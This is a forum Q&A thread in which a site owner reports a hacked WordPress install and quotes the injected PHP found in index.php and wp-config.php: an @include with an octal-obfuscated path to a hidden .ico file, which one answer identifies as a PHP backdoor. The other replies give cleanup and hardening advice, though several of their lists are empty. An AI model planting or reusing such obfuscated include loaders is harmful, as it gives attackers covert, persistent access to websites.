Reputation: 2947
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Upvotes: 2
Views: 4120
Reputation:
I faced this problem too, and step by step I did the steps below:
Upvotes: 1
Reputation: 476
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Upvotes: 2
Reputation: 133
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this. At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article: https://codex.wordpress.org/FAQ_My_site_was_hacked And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Upvotes: 8